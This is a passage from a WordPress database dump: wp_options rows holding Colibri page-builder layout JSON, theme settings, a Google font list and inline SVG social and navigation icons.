\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"margin\":{\"top\":{\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c47\"]},{\"id\":876,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c48\"]},{\"id\":878,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c50\"]},{\"id\":879,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg\"},\"position\":\"center center\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"y\":\"10\",\"blur\":\"30\"}]},\"media\":{\"mobile\":{\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"-5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c51\"]},{\"id\":880,\"type\":\"hop-content\",\"nodeId\":\"1573-c1\",\"nodes\":[\"1573-c1\"],\"v\":\"1.1\"},{\"id\":881,\"type\":\"hop-section\",\"nodeId\":\"1573-c2\",\"nodes\":[\"1573-c2\"],\"v\":\"1.1\",\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":882,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"1573-c3\",\"nodes\":[\"1573-c3\"],\"v\":\"1.1\"},{\"id\":883,\"type\":\"hop-column\",\"nodeId\":\"1573-c4\",\"nodes\":[\"1573-c4\"],\"v\":\"1.1\"},{\"id\":893,\"type\":\"hop-text\",\"nodeId\":\"1573-c14\",\"nodes\":[\"1573-c5\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\",\"typography\":{\"holders\":{\"p\":{\"color\":\"${theme.colors.0}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}}}}},{\"id\":901,\"type\":\"hop-text\",\"nodeId\":\"182-c245\",\"nodes\":[\"182-c85\"],\"v\":\"1.1\"},{\"id\":902,\"type\":\"hop-text\",\"nodeId\":\"182-c246\",\"nodes\":[\"182-c79\",\"182-c97\",\"182-c103\",\"182-c109\",\"182-c114\",\"182-c120\",\"182-c126\",\"182-c132\",\"182-c144\",\"182-c138\",\"182-c232\",\"182-c238\"],\"v\":\"1.1\"},{\"id\":910,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"v\":\"1.1\",\"nodes\":[\"182-c159\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":911,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c160\"]},{\"id\":912,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"path\":\"value\",\"value\":\"10\"},\"verticalInnerGap\":0,\"horizontalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c161\",\"182-c166\",\"182-c171\",\"182-c176\",\"182-c181\",\"182-c186\",\"182-c191\",\"182-c196\",\"182-c200\",\"182-c205\",\"182-c210\",\"182-c215\",\"182-c220\"]},{\"id\":913,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c162\",\"182-c182\",\"182-c187\",\"182-c192\",\"182-c197\",\"182-c201\",\"182-c206\",\"182-c211\",\"182-c216\",\"182-c221\"]},{\"id\":914,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c163\",\"182-c168\",\"182-c173\",\"182-c178\",\"182-c183\",\"182-c188\",\"182-c193\",\"182-c198\",\"182-c202\",\"182-c207\",\"182-c212\",\"182-c217\",\"182-c222\"]},{\"id\":915,\"type\":\"hop-text\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}},\"media\":{\"desktop\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c164\",\"182-c169\",\"182-c174\",\"182-c179\",\"182-c184\",\"182-c189\",\"182-c194\",\"182-c199\",\"182-c203\",\"182-c208\",\"182-c213\",\"182-c218\",\"182-c223\"]},{\"id\":917,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c165\",\"182-c185\",\"182-c190\",\"182-c195\",\"182-c204\",\"182-c209\",\"182-c214\",\"182-c219\",\"182-c224\"]},{\"id\":918,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c167\"]},{\"id\":919,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c170\"]},{\"id\":920,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c172\"]},{\"id\":921,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c175\"]},{\"id\":922,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c177\"]},{\"id\":923,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c180\"]},{\"id\":924,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c225\"]},{\"id\":925,\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"182-c226\"]},{\"id\":926,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c227\"]},{\"id\":970,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"v\":\"1.1\",\"nodes\":[\"182-c2\"]},{\"id\":971,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c3\"]},{\"id\":972,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"path\":\"value\",\"value\":\"10\"},\"verticalInnerGap\":0,\"horizontalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c4\",\"182-c10\",\"182-c16\",\"182-c22\",\"182-c28\",\"182-c34\",\"182-c40\",\"182-c46\",\"182-c52\",\"182-c58\",\"182-c64\"]},{\"id\":973,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c5\",\"182-c29\",\"182-c35\",\"182-c41\",\"182-c47\",\"182-c53\",\"182-c59\",\"182-c65\"]},{\"id\":974,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c6\",\"182-c12\",\"182-c18\",\"182-c24\",\"182-c30\",\"182-c36\",\"182-c42\",\"182-c48\",\"182-c54\",\"182-c60\",\"182-c66\"]},{\"id\":975,\"type\":\"hop-text\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}},\"media\":{\"desktop\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c7\",\"182-c13\",\"182-c19\",\"182-c25\",\"182-c31\",\"182-c37\",\"182-c43\",\"182-c49\",\"182-c55\",\"182-c61\",\"182-c67\"]},{\"id\":976,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"182-c8\",\"182-c14\",\"182-c20\",\"182-c26\",\"182-c32\",\"182-c38\",\"182-c44\",\"182-c50\",\"182-c56\",\"182-c62\",\"182-c68\"]},{\"id\":977,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c9\",\"182-c33\",\"182-c39\",\"182-c45\",\"182-c51\",\"182-c57\",\"182-c63\",\"182-c69\"]},{\"id\":978,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c11\"]},{\"id\":979,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c15\"]},{\"id\":980,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c17\"]},{\"id\":981,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c21\"]},{\"id\":982,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c23\"]},{\"id\":983,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c27\"]},{\"id\":984,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c70\"]},{\"id\":985,\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"182-c71\"]},{\"id\":986,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c72\"]}]\";}','yes'),(354,'colibriwp_activate_theme_name','colibri-wp','yes'),(355,'colibri_page_builder_regenerate_tries_count','1','yes'),(357,'colibriwp_fix_wp58_sidebar','1','yes'),(358,'colibri_page_builder_use_fs','c-2f25a335-3ef214be-c8dc42e-7faa310b','yes');
INSERT INTO `wp_options` VALUES (361,'extend_builder_theme_1644939954','a:13:{s:5:\"fonts\";a:2:{s:6:\"google\";a:3:{s:4:\"Muli\";a:2:{s:7:\"weights\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"400\";i:5;s:9:\"400italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Open Sans\";a:2:{s:7:\"weights\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"400\";i:3;s:9:\"400italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Playfair Display\";a:2:{s:7:\"weights\";a:6:{i:0;s:3:\"400\";i:1;s:9:\"400italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";}s:8:\"category\";s:10:\"sans-serif\";}}s:6:\"native\";a:0:{}}s:11:\"dummyChange\";s:0:\"\";s:5:\"icons\";a:11:{s:17:\"brandico/facebook\";s:284:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"facebook\" viewBox=\"0 0 486.037 1007\"><path d=\"M124 1005V536H0V367h124V223C124 110 197 5 366 5c68 0 119 7 119 7l-4 158s-52-1-108-1c-61 0-71 28-71 75v123h183l-8 169H302v469H123\"/></svg>\";s:17:\"font-awesome/star\";s:395:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"star\" viewBox=\"0 0 1664 1896.0833\"><path d=\"M1664 647q0 22-26 48l-363 354 86 500q1 7 1 20 0 21-10.5 35.5T1321 1619q-19 0-40-12l-449-236-449 236q-22 12-40 12-21 0-31.5-14.5T301 1569q0-6 2-20l86-500L25 695Q0 668 0 647q0-37 56-46l502-73L783 73q19-41 49-41t49 41l225 455 502 73q56 9 56 46z\"/></svg>\";s:28:\"font-awesome/facebook-square\";s:410:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"facebook-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1248 128q119 0 203.5 84.5T1536 416v960q0 119-84.5 203.5T1248 1664h-188v-595h199l30-232h-229V689q0-56 23.5-84t91.5-28l122-1V369q-63-9-178-9-136 0-217.5 80T820 666v171H620v232h200v595H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960z\"/></svg>\";s:27:\"font-awesome/twitter-square\";s:630:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"twitter-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1280 610q-56 25-121 34 68-40 93-117-65 38-134 51-61-66-153-66-87 0-148.5 61.5T755 722q0 29 5 48-129-7-242-65T326 550q-29 50-29 106 0 114 91 175-47-1-100-26v2q0 75 50 133.5t123 72.5q-29 8-51 8-13 0-39-4 21 63 74.5 104t121.5 42q-116 90-261 90-26 0-50-3 148 94 322 94 112 0 210-35.5t168-95 120.5-137 75-162T1176 746q0-18-1-27 63-45 105-109zm256-194v960q0 119-84.5 203.5T1248 1664H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960q119 0 203.5 84.5T1536 416z\"/></svg>\";s:27:\"font-awesome/youtube-square\";s:1354:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"youtube-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M919 1303v-157q0-50-29-50-17 0-33 16v224q16 16 33 16 29 0 29-49zm184-122h66v-34q0-51-33-51t-33 51v34zM532 915v70h-80v423h-74V985h-78v-70h232zm201 126v367h-67v-40q-39 45-76 45-33 0-42-28-6-17-6-54v-290h66v270q0 24 1 26 1 15 15 15 20 0 42-31v-280h67zm252 111v146q0 52-7 73-12 42-53 42-35 0-68-41v36h-67V915h67v161q32-40 68-40 41 0 53 42 7 21 7 74zm251 129v9q0 29-2 43-3 22-15 40-27 40-80 40-52 0-81-38-21-27-21-86v-129q0-59 20-86 29-38 80-38t78 38q21 29 21 86v76h-133v65q0 51 34 51 24 0 30-26 0-1 .5-7t.5-16.5V1281h68zM785 457v156q0 51-32 51t-32-51V457q0-52 32-52t32 52zm533 713q0-177-19-260-10-44-43-73.5t-76-34.5q-136-15-412-15-275 0-411 15-44 5-76.5 34.5T238 910q-20 87-20 260 0 176 20 260 10 43 42.5 73t75.5 35q137 15 412 15t412-15q43-5 75.5-35t42.5-73q20-84 20-260zM563 519l90-296h-75l-51 195-53-195h-78q7 23 23 69l24 69q35 103 46 158v201h74V519zm289 81V470q0-58-21-87-29-38-78-38-51 0-78 38-21 29-21 87v130q0 58 21 87 27 38 78 38 49 0 78-38 21-27 21-87zm181 120h67V350h-67v283q-22 31-42 31-15 0-16-16-1-2-1-26V350h-67v293q0 37 6 55 11 27 43 27 36 0 77-45v40zm503-304v960q0 119-84.5 203.5T1248 1664H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960q119 0 203.5 84.5T1536 416z\"/></svg>\";s:25:\"font-awesome/vimeo-square\";s:540:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"vimeo-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1292 638q10-216-161-222-231-8-312 261 44-19 82-19 85 0 74 96-4 57-74 167t-105 110q-43 0-82-169-13-54-45-255-30-189-160-177-59 7-164 100l-81 72-81 72 52 67q76-52 87-52 57 0 107 179 15 55 45 164.5t45 164.5q68 179 164 179 157 0 383-294 220-283 226-444zm244-222v960q0 119-84.5 203.5T1248 1664H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960q119 0 203.5 84.5T1536 416z\"/></svg>\";s:17:\"font-awesome/plus\";s:353:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"plus\" viewBox=\"0 0 1408 1896.0833\"><path d=\"M1408 736v192q0 40-28 68t-68 28H896v416q0 40-28 68t-68 28H608q-40 0-68-28t-28-68v-416H96q-40 0-68-28T0 928V736q0-40 28-68t68-28h416V224q0-40 28-68t68-28h192q40 0 68 28t28 68v416h416q40 0 68 28t28 68z\"/></svg>\";s:18:\"font-awesome/minus\";s:251:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"minus\" viewBox=\"0 0 1408 1896.0833\"><path d=\"M1408 736v192q0 40-28 68t-68 28H96q-40 0-68-28T0 928V736q0-40 28-68t68-28h1216q40 0 68 28t28 68z\"/></svg>\";s:25:\"font-awesome/chevron-left\";s:320:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"chevron-left\" viewBox=\"0 0 1289.1823 1896.0833\"><path d=\"M1171 301L640 832l531 531q19 19 19 45t-19 45l-166 166q-19 19-45 19t-45-19L173 877q-19-19-19-45t19-45L915 45q19-19 45-19t45 19l166 166q19 19 19 45t-19 45z\"/></svg>\";s:26:\"font-awesome/chevron-right\";s:317:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"chevron-right\" viewBox=\"0 0 1280 1896.0833\"><path d=\"M1107 877l-742 742q-19 19-45 19t-45-19l-166-166q-19-19-19-45t19-45l531-531-531-531q-19-19-19-45t19-45L275 45q19-19 45-19t45 19l742 742q19 19 19 45t-19 45z\"/></svg>\";s:17:\"font-awesome/bars\";s:439:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 